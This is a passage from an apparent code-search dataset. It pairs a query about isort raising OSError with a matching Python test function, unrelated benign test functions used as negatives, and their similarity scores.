out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n\n return 1", "def test_radix(self):\n integers = radix_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_asciitable_m_pure_ascii(self):\n input = '''\n+========+========+========+========+========+========+========+\n| type | tota | used | fr ee | shar | buff | avai |\n| | l | | | ed | _cac | labl |\n| | | | | | he | e |\n+========+========+========+========+========+========+========+\n| Mem | 3861 | 2228 | 3364 | 1183 | 2743 | 3389 |\n| | 332 | 20 | 176 | 2 | 36 | 588 |\n+--------+--------+--------+--------+--------+--------+--------+\n| | | | | | | |\n| | | | | test 2 | | |\n+--------+--------+--------+--------+--------+--------+--------+\n| last | last | last | ab cde | | | final |\n+========+========+========+========+========+========+========+\n '''\n expected = [\n {\n \"type\": \"Mem\",\n \"tota_l\": \"3861\\n332\",\n \"used\": \"2228\\n20\",\n \"fr_ee\": \"3364\\n176\",\n \"shar_ed\": \"1183\\n2\",\n \"buff_cac_he\": \"2743\\n36\",\n \"avai_labl_e\": \"3389\\n588\"\n },\n {\n \"type\": None,\n \"tota_l\": None,\n \"used\": None,\n \"fr_ee\": None,\n \"shar_ed\": \"test 2\",\n \"buff_cac_he\": None,\n \"avai_labl_e\": None\n },\n {\n \"type\": \"last\",\n \"tota_l\": \"last\",\n \"used\": \"last\",\n \"fr_ee\": \"ab cde\",\n \"shar_ed\": None,\n \"buff_cac_he\": None,\n \"avai_labl_e\": \"final\"\n }\n ]\n\n self.assertEqual(jc.parsers.asciitable_m.parse(input, quiet=True), expected)", "def test_basic_parsers():", "def validate(self):\n if len(self.independent_nodes) > 0:\n try:\n self.topological_sort()\n return True\n except ValueError:\n return False\n return False", "def test_convert(self):\n out_text = StringIO()\n with redirect_stdout(out_text):\n main([\"-id\", indir, \"-od\", compdir, \"-if\", \"ttl\", \"-of\", \"json-ld\"])\n self.assertEqual(\"\"\"Total=3 Successful=3\"\"\", out_text.getvalue().strip())", "def test_sorted_page_stream(self):\n self._test_insertion(Macros, 0)", "def test_heap_sort(self):\n integers = heap_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def test_inflate_denoiser_output(self):\r\n actual = list(inflate_denoiser_output(\r\n parse_fasta(self.centroid_seqs1),\r\n parse_fasta(self.singleton_seqs1),\r\n self.denoiser_mapping1,\r\n parse_fasta(self.raw_seqs1)))\r\n expected = [(\"S1_0 FXX111 some comments\", \"TTTT\"),\r\n (\"S1_2 FXX113 some other comments\", \"TTTT\"),\r\n (\"S3_7 FXX117\", \"TTTT\"),\r\n (\"S2_1 FXX112 some comments\", \"TATT\"),\r\n (\"S3_5 FXX114\", \"TATT\"),\r\n (\"S3_6 FXX115\", \"TTGA\"),\r\n (\"S3_6 FXX116\", \"TAGA\")]\r\n self.assertEqual(actual, expected)", "def main(argv):\r\n\terror_code = 0\r\n\tlist = [5, 9, 8, 2, 0, 4, 7, 6, 1, 7]\r\n\tprint('Unsorted list:')\r\n\tprint(list)\r\n\tlist = selection_sort(list)\r\n\tprint('Sorted list:')\r\n\tprint(list)\r\n\treturn error_code", "def _fix_shortsort(self):\n test_dir = join_path(self.install_test_root, self.test_src_dir)\n filter_file(\"../src/\", \"\", join_path(test_dir, \"testshortsort.sh\"))", "def test_print_result(capsys):\n assert \"\"\"Total 5 hands solved\nTotal 4 hands solved with hint\nTotal 4 hands failed to solve\"\"\" in hl.test_help_print_result(capsys)", "def test_parse_results_error():\n error_result = [{\"error\": \"test\"}]\n assert [{\"title\": \"Error\",\n \"subtitle\": \"test\",\n \"valid\": False}] == parse_results(error_result)", "def test_workloads_list_command_human_readable(\n workloads_list_success, workloads_list_success_hr\n):\n hr_output = prepare_workloads_list_output(workloads_list_success)\n assert hr_output == workloads_list_success_hr", "def test_sort_success_return_sortedArray(self):\n\n # prepare\n unsortedArray = [12.0, 13.5, 1.0, 5.5,\n 9.0, 19.5, 12.0, 23.5, 5.0, 51.0]\n expectedResult = [1.0, 5.0, 5.5, 9.0,\n 12.0, 12.0, 13.5, 19.5, 23.5, 51.0]\n\n # execute\n actuatlResponse = PSPQuickSortProcess.sort(unsortedArray)\n\n # assert\n self.assertEqual(expectedResult, actuatlResponse)", "def test_sort_natural(self):\n\n test_cases = [\n Case(\n description=\"lists of strings\",\n val=[\"b\", \"a\", \"C\", \"B\", \"A\"],\n args=[],\n kwargs={},\n expect=[\"a\", \"A\", \"b\", \"B\", \"C\"],\n ),\n Case(\n description=\"lists of strings with a None\",\n val=[\"b\", \"a\", None, \"C\", \"B\", \"A\"],\n args=[],\n kwargs={},\n expect=[None, \"a\", \"A\", \"b\", \"B\", \"C\"],\n ),\n Case(\n description=\"lists of objects with key\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n args=[\"title\"],\n kwargs={},\n expect=[{\"title\": \"bar\"}, {\"title\": \"Baz\"}, {\"title\": \"foo\"}],\n ),\n Case(\n description=\"lists of objects with missing key\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"heading\": \"Baz\"}],\n args=[\"title\"],\n kwargs={},\n expect=[{\"title\": \"bar\"}, {\"title\": \"foo\"}, {\"heading\": \"Baz\"}],\n ),\n Case(\n description=\"empty list\",\n val=[],\n args=[],\n kwargs={},\n expect=[],\n ),\n Case(\n description=\"too many arguments\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n args=[\"title\", \"heading\"],\n kwargs={},\n expect=FilterArgumentError,\n ),\n Case(\n description=\"value not an array\",\n val=1234,\n args=[],\n kwargs={},\n expect=FilterValueError,\n ),\n Case(\n description=\"undefined left value\",\n val=self.env.undefined(\"test\"),\n args=[],\n kwargs={},\n expect=[],\n ),\n Case(\n description=\"undefined argument\",\n val=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n args=[self.env.undefined(\"test\")],\n kwargs={},\n expect=[{\"title\": \"foo\"}, {\"title\": \"bar\"}, {\"title\": \"Baz\"}],\n ),\n ]\n\n self._test(SortNatural, test_cases)", "def test_asciitable_m_pure_ascii_extra_spaces(self):\n input = '''\n \n \n +========+========+========+========+========+========+========+\n | type | tota | used | fr ee | shar | buff | avai \n | | l | | | ed | _cac | labl \n | | | | | | he | e |\n +========+========+========+========+========+========+========+ \n | Mem | 3861 | 2228 | 3364 | 1183 | 2743 | 3389 |\n | | 332 | 20 | 176 | 2 | 36 | 588 |\n +--------+--------+--------+--------+--------+--------+--------+\n | | | | | | | |\n | | | | | test 2 | | | \n +--------+--------+--------+--------+--------+--------+--------+\n | last | last | last | ab cde | | | final \n +========+========+========+========+========+========+========+ \n \n \n '''\n expected = [\n {\n \"type\": \"Mem\",\n \"tota_l\": \"3861\\n332\",\n \"used\": \"2228\\n20\",\n \"fr_ee\": \"3364\\n176\",\n \"shar_ed\": \"1183\\n2\",\n \"buff_cac_he\": \"2743\\n36\",\n \"avai_labl_e\": \"3389\\n588\"\n },\n {\n \"type\": None,\n \"tota_l\": None,\n \"used\": None,\n \"fr_ee\": None,\n \"shar_ed\": \"test 2\",\n \"buff_cac_he\": None,\n \"avai_labl_e\": None\n },\n {\n \"type\": \"last\",\n \"tota_l\": \"last\",\n \"used\": \"last\",\n \"fr_ee\": \"ab cde\",\n \"shar_ed\": None,\n \"buff_cac_he\": None,\n \"avai_labl_e\": \"final\"\n }\n ]\n\n self.assertEqual(jc.parsers.asciitable_m.parse(input, quiet=True), expected)", "def test_invalid_values(self):\n self.assertEqual(dictsort([1, 2, 3], \"age\"), \"\")\n self.assertEqual(dictsort(\"Hello!\", \"age\"), \"\")\n self.assertEqual(dictsort({\"a\": 1}, \"age\"), \"\")\n self.assertEqual(dictsort(1, \"age\"), \"\")", "def test_update_enforcement_mode_command_failure_human_readable(\n enforcement_mode_failure_hr, enforcement_mode_failure_expected\n):\n resp = prepare_update_enforcement_mode_output(enforcement_mode_failure_expected)\n\n assert resp == enforcement_mode_failure_hr", "def test_natsort_case_insensitive(self):\r\n\r\n # string with alpha and numerics sort correctly\r\n s = [\r\n 'sample1',\r\n 'sample2',\r\n 'sample11',\r\n 'sample12',\r\n 'SAmple1',\r\n 'Sample2']\r\n\r\n # expected values\r\n exp_natsort = ['SAmple1', 'Sample2', 'sample1', 'sample2', 'sample11',\r\n 'sample12']\r\n exp_natsort_case_insensitive = ['sample1', 'SAmple1', 'sample2',\r\n 'Sample2', 'sample11', 'sample12']\r\n\r\n # test natsort\r\n self.assertEqual(natsort(s), exp_natsort)\r\n # test natsort_case_insensitive\r\n self.assertEqual(natsort_case_insensitive(s),\r\n exp_natsort_case_insensitive)\r\n\r\n s.reverse()\r\n # test natsort\r\n self.assertEqual(natsort(s), exp_natsort)\r\n # test natsort_case_insensitive\r\n self.assertEqual(natsort(list('cbaA321')), list('123Aabc'))\r\n\r\n # strings with alpha only sort correctly\r\n self.assertEqual(natsort_case_insensitive(list('cdBa')), list('aBcd'))\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(natsort_case_insensitive(['11', '2', '1', '0']),\r\n ['0', '1', '2', '11'])\r\n\r\n # strings of floats sort correctly\r\n self.assertEqual(natsort_case_insensitive(['1.11', '1.12', '1.00',\r\n '0.009']), ['0.009', '1.00',\r\n '1.11', '1.12'])\r\n\r\n # string of ints sort correctly\r\n self.assertEqual(natsort_case_insensitive([('11', 'A'), ('2', 'B'),\r\n ('1', 'C'), ('0', 'D')]),\r\n [('0', 'D'), ('1', 'C'),\r\n ('2', 'B'), ('11', 'A')])", "def test_parse_output_error(self):\n self.assertRaises(ValueError,\n parse_output,\n hgt_results_fp=self.consel_output_hgt_fp,\n method=\"Consel\")", "def test_correct_parsing(self):\n test_length = random.randint(0,100)\n test_string = \"#\\t{0}\".format(\"\\t\".join(map(str, xrange(test_length))))\n expected = [extract_mock(s) for s in xrange(test_length)]\n computed = self.parser.parse_header(test_string, extract_mock)\n self.assertEquals(expected, computed)", "def test_parser_all(self):\n args = [\"directory\", \"-n\", \"-f\", \"-r\"]\n parser = setup_parser()\n output = parser.parse_args(args)\n self.assertEqual(output.directory, \"directory\")\n self.assertFalse(output.colorize)\n self.assertTrue(output.fancy)\n self.assertTrue(output.reverse)", "def main(argv):\r\n\terror_code = 0\r\n\tlist = [5, 9, 8, 2, 0, 4, 7, 6, 1, 7]\r\n\tprint('Unsorted list:')\r\n\tprint(list)\r\n\tlist = quick_sort(list)\r\n\tprint('Sorted list:')\r\n\tprint(list)\r\n\treturn error_code", "def check(self, input, ast):\n assert False # Must be redefined", "def test_reversed_version_sorting(self):\n assert natsort(['1', '5', '10', '50'], reverse=True) == ['50', '10', '5', '1']", "def check_cot_output(self, expected):\n sys.stdout = StringIO.StringIO()\n output = None\n try:\n self.instance.run()\n except (TypeError, ValueError, SyntaxError, LookupError):\n self.fail(traceback.format_exc())\n finally:\n output = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n self.maxDiff = None\n self.assertMultiLineEqual(expected.strip(), output.strip())", "def test_sam_parser_success(self):\n # self.cleanup = False\n\n sam_file = '%s/../human_100.sam' % GOLDEN_DIR\n count = 0\n\n with open(sam_file, 'r') as sam:\n for line in sam:\n # Skip tags\n if line[0] == '@':\n continue\n\n alignment = parse_sam_line(line)\n\n # Verify that the type conversions are all correct\n types = {}\n for entry in sam_format():\n types[entry['name']] = entry['type']\n\n for field in alignment:\n self.assertIs(type(alignment[field]), types[field])\n\n count = count + 1\n\n self.assertEqual(count, 100)" ]
[ "0.6781174", "0.6635181", "0.6309134", "0.62981886", "0.61402726", "0.6060493", "0.60508925", "0.59607303", "0.5936084", "0.59126383", "0.587762", "0.58522105", "0.5729688", "0.56102586", "0.5577316", "0.55231833", "0.5521064", "0.55136585", "0.55019987", "0.54842657", "0.5482111", "0.5479343", "0.54657125", "0.54582775", "0.54581916", "0.54488796", "0.5425367", "0.54231393", "0.5421183", "0.5408248", "0.5405454", "0.5381841", "0.5372667", "0.5368157", "0.5366018", "0.5357217", "0.53548884", "0.53300023", "0.5320169", "0.5312435", "0.5308419", "0.53077173", "0.53075135", "0.53067285", "0.5306131", "0.53045064", "0.5294904", "0.5293883", "0.52787155", "0.52369976", "0.52369505", "0.5235237", "0.5232342", "0.52092105", "0.5207558", "0.51853544", "0.5180541", "0.51695865", "0.5168456", "0.5165643", "0.5161634", "0.51588595", "0.5155746", "0.5155369", "0.51551974", "0.51461416", "0.5120987", "0.5106656", "0.5105906", "0.5097108", "0.5094501", "0.50900066", "0.5087463", "0.50844145", "0.50786316", "0.5071691", "0.5066559", "0.50514275", "0.50492316", "0.5048198", "0.50476885", "0.5047438", "0.50459206", "0.50456524", "0.50431645", "0.5042678", "0.5036043", "0.5035931", "0.50309134", "0.5021781", "0.50148034", "0.49965024", "0.49937817", "0.49921626", "0.49920163", "0.4990554", "0.49901894", "0.49876922", "0.4986972", "0.49865675" ]
0.77473277
0
Test what happens when an OSError is raised (usually means isort doesn't exist).
def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output): mock_subprocess_check_output.side_effect = OSError("mocked error") itp = setup_isort_tool_plugin() package = Package( "valid_package", os.path.join(os.path.dirname(__file__), "valid_package") ) package["python_src"] = [ os.path.join(os.path.dirname(__file__), "valid_package", "sample.py") ] issues = itp.scan(package, "level") assert not issues
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def os_error():\n en = ctypes.get_errno()\n ctypes.set_errno(0)\n if en == 0:\n return OSError(en, \"(no errno found)\")\n else:\n return OSError(en, errno.errorcode[en])", "def test_dump_handles_os_error(mocker):\n\tmocker.patch('subprocess.Popen', side_effect=OSError('no such file'))\n\twith pytest.raises(SystemExit):\n\t\tpgdump.dump(url)", "def test_load_json_os_error() -> None:\n fname = \"/\"\n with pytest.raises(HomeAssistantError) as err:\n load_json(fname)\n assert isinstance(err.value.__cause__, OSError)", "def test_dump_handles_oserror(mocker):\n mocker.patch('subprocess.Popen' , side_effect=OSError(\"no such file\"))\n with pytest.raises(SystemExit):\n pgdump.dump(url)", "def test_make_sure_path_exists_correctly_handle_os_error(mocker):\n mocker.patch(\"pathlib.Path.mkdir\", side_effect=OSError)\n with pytest.raises(OSError) as err:\n utils.make_sure_path_exists(Path('protected_path'))\n assert str(err.value) == \"Unable to create directory at protected_path\"", "def _check_error(return_value):\n if return_value < 0:\n raise IOError(pm.lib.Pm_GetErrorText(return_value))", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n SshErrorExitCodeController(255, ERROR_MESSAGE)\\\n .check_if_error()", "def test_make_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError('mocked error')\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n package['make_targets'] = 'make_targets'\n issues = mtp.scan(package, 'level')\n assert issues is None", "def _check(error: int) -> None:\n if error < 0:\n raise RuntimeError(ffi.string(lib.TCOD_get_error()).decode())", "def test_shell_bad_command():\n out, err = shell_command(\"ls adasdasdas\")\n assert out is None\n assert \"adasdasdas\" in err", "def _file_does_not_exist_error(exception):\n stre = str(exception)\n # return any(err in stre for err in (\"ENOENT\", \"ENODEV\", \"EINVAL\"))\n return any(err in stre for err in (\"ENOENT\", \"ENODEV\", \"EINVAL\"))", "def suppress_oserror(*errnos):\n try:\n yield\n except OSError as e:\n if e.errno not in errnos:\n raise e", "def walk_error(os_error):\n printer(\"Cannot access '{}'; zip creation aborted\".format(os_error.filename), \"error\", True)\n raise os_error", "def test_missing_file():\n passed = False\n try:\n x = XPIManager('foo.bar')\n except:\n passed = True\n assert passed", "def test_missing_file(self):\n with self.assertRaises(subprocess.CalledProcessError) as cm:\n subprocess.check_output(\n [sys.executable, idf_py_path, '--version', '@args_non_existent'],\n env=os.environ,\n stderr=subprocess.STDOUT).decode('utf-8', 'ignore')\n self.assertIn('(expansion of @args_non_existent) could not be opened', cm.exception.output.decode('utf-8', 'ignore'))", "def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foobar')", "def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foobar')", "def test_invalid_path() -> None:\n path = rsc / \"does-not-exist.ods\"\n with pytest.raises(FileNotFoundError, match=\"does not exist\"):\n read_ods(path)", "def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foobar')", "def test_option_unhandled(self):\n cmd, output = runCmdOutput(['--__unhandled__'])\n self.assertEqual(cmd.returncode, os.EX_USAGE)", "def test_existing_file_after_assert_error(exist_of_file):\n try:\n assert read_magic_number(exist_of_file)\n except AssertionError:\n print(\"Now lets do check of existing file\")", "def test_exceptions():\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.connect(path=r\"No process with this please\")\r\n assert False\r\n except application.ProcessNotFoundError:\r\n print('ProcessNotFoundError has been raised. OK.')\r\n\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.start(cmd_line = r\"No process with this please\")\r\n assert False\r\n except application.AppStartError:\r\n print('AppStartError has been raised. OK.')", "def test_check_if_not_error(self):\n actual_result = SshErrorExitCodeController(ERROR_RETURN_CODE,\n OK_MESSAGE)\\\n .check_if_error()\n self.assertIsNone(actual_result)", "def _errcheck_link(value, func, args): # pylint: disable=W0613\n # The windows api returns nonzero if the call was successful\n if value != 0:\n return\n\n last_error = ctypes.windll.kernel32.GetLastError()\n # Somehow CreateSymbolicLinkW and CreateHardLinkW retuns zero\n # and the last error is 2 (The system cannot find the file specified)\n # but the link is created successfuly\n # it seems like a bug in the WinAPI\n if last_error == 0 or last_error == 2:\n return\n if last_error == 183:\n raise OSError(errno.EEXIST,\n \"Cannot create a file when that file already exists\",\n args[0])", "def test_bad_file() -> None:\n\n bad = random_string()\n rv, out = getstatusoutput(f'{RUN} {bad}')\n assert rv != 0\n assert out.lower().startswith('usage:')\n assert re.search(f\"No such file or directory: '{bad}'\", out)", "def test_check_if_error_one(self):\n with self.assertRaises(MyError):\n SshpassErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def test_check_if_not_error(self):\n actual_result = SshErrorExitCodeController(OK_RETURN_CODE,\n OK_MESSAGE)\\\n .check_if_error()\n self.assertIsNone(actual_result)", "def test_no_such_file(self):\n\t\twith self.assertRaises(IOError):\n\t\t\tanalyse_text('foobar')", "def test_watch_raises(capsys):\n with mock.patch('uflash.watch_file', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--watch', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error watching test.py'\n assert expected in stderr", "def convert_oserror(exc, pid=None, name=None):\n assert isinstance(exc, OSError), exc\n if is_permission_err(exc):\n return AccessDenied(pid=pid, name=name)\n if exc.errno == errno.ESRCH:\n return NoSuchProcess(pid=pid, name=name)\n raise exc", "def raise_for_darwin_exception(response: requests.Response) -> None:\n if response.status_code == 200:\n return\n if response.status_code == 401:\n raise Unauthorized(response)\n if response.status_code == 404:\n raise NotFound(response)", "def check_platform():\n if os.getcwd() != os.path.dirname(os.path.abspath(__file__)):\n error = \"must be ran in the directory it's located at\"\n if os.path.sep != '/':\n error = \"a unix-like operating system is required\"\n elif not shutil.which('dpkg-deb'):\n error = \"cannot find dpkg-deb\"\n elif os.getuid() != 0:\n error = \"must be ran as root (or with fakeroot)\"\n else:\n return\n sys.exit(\"{}: error: {}\".format(sys.argv[0], error))", "def test_info_fail(self):\n path = \"non_existing_audio.wav\"\n with self.assertRaisesRegex(RuntimeError, path):\n self._info(path)", "def test_NameError(n=2):\n\n p = platform_name()\n\n try:\n p.result()\n except NameError:\n print(\"Caught NameError\")\n else:\n assert False, \"Raise the wrong Error\"", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n ExecutionExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def test_exit_on_missing_file(self):\n with self.assertRaises(SystemExit):\n pyint = Interpreter()\n pyint.run(file=MISSING_FILE)", "def test_unexpected_error_in_exists(self):\n # TODO\n one_process_workflow = \"\"\"buggy://B <- file://A\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow, extra_resource=BuggyExistsResource)\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle while checking existence of '\n 'output resources' ) >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in exists()\")') >= 0, process.error_message\n assert process.error_message.find('Process cannot be considered complete.') >= 0, process.error_message", "def test_noreleaseerror_raise(self, mock_path, mock_open, mock_error):\n # Set the mocked functions returned values\n mock_path.isfile.side_effect = [True]\n mock_context_manager = mock.Mock()\n mock_open.return_value = mock_context_manager\n mock_file = mock.Mock()\n mock_file.read.return_value = \"WRONG\"\n mock_enter = mock.Mock()\n mock_enter.return_value = mock_file\n mock_exit = mock.Mock()\n setattr(mock_context_manager, \"__enter__\", mock_enter)\n setattr(mock_context_manager, \"__exit__\", mock_exit)\n\n # Test execution\n ConnectomistWrapper._connectomist_version_check(\"/my/path/mock_conf\")\n self.assertEqual(len(mock_error.call_args_list), 1)", "def testError(self):\n cmds = \"\"\"chown 0 missingFile\npwd\nexit\n\"\"\"\n\n def _cbCheckResult(res):\n self.assertNotIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def is_permission_err(exc):\n assert isinstance(exc, OSError), exc\n # On Python 2 OSError doesn't always have 'winerror'. Sometimes\n # it does, in which case the original exception was WindowsError\n # (which is a subclass of OSError).\n return exc.errno in (errno.EPERM, errno.EACCES) or \\\n getattr(exc, \"winerror\", -1) in (cext.ERROR_ACCESS_DENIED,\n cext.ERROR_PRIVILEGE_NOT_HELD)", "def test_nonexistent_path():\r\n with pytest.raises(RuntimeError):\r\n Image(os.path.join(current_dir, \"0--0.jpg\")).read_all()\r\n assert check_md5(path, jpg_path), \"The file has been changed when reading\"", "def testTempDirOrininalErrorRaised(self):\n self.Patch(os, \"chmod\")\n self.Patch(tempfile, \"mkdtemp\", return_value=\"/tmp/tempdir\")\n expected_error = OSError(\"Expected OS Error\")\n self.Patch(shutil, \"rmtree\", side_effect=expected_error)\n\n class ExpectedException(Exception):\n \"\"\"Expected exception.\"\"\"\n\n def _Call():\n with utils.TempDir():\n raise ExpectedException(\"Expected Exception\")\n\n # Verify.\n # ExpectedException should be raised, and OSError\n # should not be raised.\n self.assertRaises(ExpectedException, _Call)\n tempfile.mkdtemp.assert_called_once() #pylint: disable=no-member\n shutil.rmtree.assert_called_with(\"/tmp/tempdir\") #pylint: disable=no-member", "def test_handles_error(self):\n with self.assertRaises(ForcedExit):\n self.run_command(mkdtemp())\n\n self.assertResults(\n result_with_hint(\n u'This repository has not been initialized.',\n GIT_REPO_NOT_INITIALIZED),\n self.error)", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n BaseErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def check_os():\n\n if platform.system() != \"Darwin\":\n print \"This script only works on macos system\"\n exit(1)", "def test_cmd_error(self):\n task = Task(\"uid\", False, False, \"does_not_exist\", None, \".\")\n task._checkpoint_dir = tmp_checkpoint_dir()\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task.shell = True\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task._dry_run = True\n task.run() # No longer raises RuntimeError", "def test_normal_use(self):\n # Setup:\n class DatabaseError(Exception):\n pass\n\n # Python 2 and 3:\n from future.utils import raise_from\n\n class FileDatabase:\n def __init__(self, filename):\n try:\n self.file = open(filename)\n except IOError as exc:\n raise_from(DatabaseError('failed to open'), exc)\n\n # Testing the above:\n try:\n fd = FileDatabase('non_existent_file.txt')\n except Exception as e:\n assert isinstance(e.__cause__, IOError) # FileNotFoundError on\n # Py3.3+ inherits from IOError", "def check_result(ec):\r\n # NOTE: This will break some oscilloscopes that are powered by USB.\r\n # Some of the newer scopes, can actually be powered by USB and will\r\n # return a useful value. That should be given back to the user.\r\n # I guess we can deal with these edge cases in the functions themselves\r\n if ec == 0:\r\n return\r\n\r\n else:\r\n ecName = error_num_to_name(ec)\r\n ecDesc = error_num_to_desc(ec)\r\n raise IOError('Error calling %s: %s (%s)' % (\r\n str(inspect.stack()[1][3]), ecName, ecDesc))", "def test_the_main_non_existent_file(self):\r\n with self.assertRaises(SystemExit):\r\n the_main_function(\"non existent file\")", "def test_is_information_written_through_stderr_methods(self):\n\n io = BufferedSystemIO()\n io._stdout = lambda *args, **kwargs: None\n\n try:\n raise IndexError('Invalid index 5')\n except Exception as exc:\n output_formatted_exception(exc, ':my-test-task', io)\n\n self.assertIn('IndexError', io.get_value())\n self.assertIn('Invalid index 5', io.get_value())\n self.assertIn('Retry with \"-rl debug\" switch before failed task to see stacktrace', io.get_value())", "def test_raises_error_on_hostnotfound(self):\n self.mock_getaddrinfo.side_effect = socket.gaierror('error_message')\n return_value = None\n with self.assertRaises(CMDLineExit) as cm:\n return_value = sanitize_host('erroneous_host')\n self.assertIsNone(return_value)\n self.assertEqual(\n cm.exception.args[0],\n 'Could not resolve hostname \\'erroneous_host\\': error_message')\n self.mock_getaddrinfo.assert_called_once_with(\n 'erroneous_host', 443, socket.AF_INET, socket.SOCK_STREAM)\n self.mock_gethostbyaddr.assert_not_called()", "def run_or_die(command):\n (status, stdio) = commands.getstatusoutput(command)\n if status != 0:\n raise Exception(\"command '%s' failed with exit status %d and output '%s'\" % (command, status, stdio))\n return stdio", "def test_simple_source_constructor_exception():\n TESTPATH = \"/usr/local/share/testfile.mp3\"\n with pytest.raises(robox.RDJResourceErr):\n test01 = Source(path=TESTPATH, exist=True)", "def error_check(command):\r\n\r\n # TODO\r", "def errorCheck(sh, returncode, stderr):\n\tif returncode!=0 or stderr!='':\n\t\tif config.DEBUG:\n\t\t\tmsg = \"sh code execution [%s] returned non-zero exit status [%s] and/or non-empty stdterr [%s]\" % (repr(sh), returncode, repr(stderr.strip()))\n\t\telse:\n\t\t\tmsg = \"sh code execution returned non-zero exit status and/or non-empty stdterr\"\n\t\traise Exception(msg)", "def test_bad_file():\n\n bad = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))\n rv, out = getstatusoutput(f'{prg} -f {bad}')\n assert rv != 0\n assert re.match('usage:', out, re.I)\n assert re.search(f\"No such file or directory: '{bad}'\", out)", "def test_invoke_pipe_not_found():\n\n testapp = holocron.Application()\n\n with pytest.raises(ValueError) as excinfo:\n next(testapp.invoke(\"test\"))\n\n assert str(excinfo.value) == \"no such pipe: 'test'\"", "def test_not_running(): # pragma: windows\n comm_kwargs = dict(comm='IPCComm', direction='send', reverse_names=True)\n nt.assert_raises(RuntimeError, new_comm, 'test', **comm_kwargs)", "def test_mount_failure(self):\n with prepared_image_file(create_filesystem=False):\n program = RsyncSystemBackup(\n crypto_device=CRYPTO_NAME,\n destination=os.path.join(MOUNT_POINT, 'latest'),\n mount_point=MOUNT_POINT,\n )\n # When `mount' fails it should exit with a nonzero exit code,\n # thereby causing executor to raise an ExternalCommandFailed\n # exception that obscures the FailedToMountError exception that\n # we're interested in. The check=False option enables our\n # `last resort error handling' code path to be reached.\n program.destination_context.options['check'] = False\n self.assertRaises(FailedToMountError, program.execute)", "def _try_ignoring_ent_and_perm(func, *args, **kwargs):\n try:\n func(*args, **kwargs)\n except OSError as err:\n if err.errno == errno.ENOENT or err.errno == errno.EPERM:\n return\n else:\n raise err", "def test_nonexistent_path(tmpdir):\n with pytest.raises(IOError):\n checksum(tmpdir.join(\"does-not-exist.txt\").strpath)", "def exitIfFileDescriptorError(exit_code, device):\n if exit_code == ExitCode.FILE_DESCRIPTOR_ERROR:\n logging.critical(\"Cannot access to %s.\", device)\n sys.exit(ExitCode.FILE_DESCRIPTOR_ERROR)", "def test_open_image_throws(self):\n self.expect_open_image(\n 'SomeBlobKey',\n throw_exception=apiproxy_errors.ApplicationError(\n images_service_pb.ImagesServiceError.INVALID_BLOB_KEY))\n self.mox.ReplayAll()\n try:\n self.app._transform_image('SomeBlobKey', '')\n raise self.failureException('Should have thrown ApplicationError')\n except apiproxy_errors.ApplicationError:\n pass\n self.mox.VerifyAll()", "def onerror(func, path, exc_info):\n import stat\n if not os.path.exists(path):\n pass\n elif not os.access(path, os.W_OK):\n # Is the error an access error ?\n os.chmod(path, stat.S_IWUSR)\n func(path)\n else:\n raise", "def test_fetch_py_err():\n ident = _id()\n entry_dir = os.path.join(basedir, 'always_error', ident)\n res = proj.fetch('always_error', ident)\n assert res.result is None\n paths = ['error.log', 'status', 'run.log', 'start_time', 'end_time']\n for p in paths:\n assert os.path.exists(os.path.join(entry_dir, p))\n with open(res.paths['log']) as fd:\n assert 'output here' in fd.read()\n with open(res.paths['error']) as fd:\n assert 'This is an error!' in fd.read()\n with open(res.paths['status']) as fd:\n status = fd.read()\n assert status == 'error'\n assert res.status == status\n with open(res.paths['start_time']) as fd:\n start_time = int(fd.read())\n with open(res.paths['end_time']) as fd:\n end_time = int(fd.read())\n assert start_time <= end_time", "def test_exc(self):\n g = h5g.open(self.fid, '/')\n g._close()\n self.assertRaises(ValueError, h5i.get_file_id, g)", "def test_raise_error_unknown_file():\n\n options = {'input_files': ['Sparta.lol']}\n\n with pytest.raises(KeyError) as excinfo:\n 